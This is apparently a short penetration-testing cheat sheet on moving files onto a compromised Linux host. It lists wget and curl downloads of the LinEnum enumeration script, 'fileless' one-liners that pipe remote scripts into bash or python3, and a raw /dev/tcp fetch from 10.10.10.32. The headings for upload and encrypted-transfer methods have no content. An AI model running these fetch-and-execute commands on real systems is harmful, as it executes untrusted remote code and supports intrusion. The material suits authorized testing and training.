Linux Transfers
wget
wget https://example.com/LinEnum.sh -O /tmp/LinEnum.shcurl
curl -o /tmp/LinEnum.sh https://example.com/LinEnum.shFileless (Pipe to Interpreter)
curl https://example.com/LinEnum.sh | bash
wget -qO- https://example.com/script.py | python3Bash /dev/tcp (No curl/wget)
exec 3<>/dev/tcp/10.10.10.32/80
echo -e "GET /LinEnum.sh HTTP/1.1\n\n">&3
cat <&3Base64 (No Network)
Uploads — curl to Python uploadserver
Uploads — Web Server on Compromised Host
SCP (SSH)
OpenSSL Encrypted Transfer
OpenSSL File Encryption
Last updated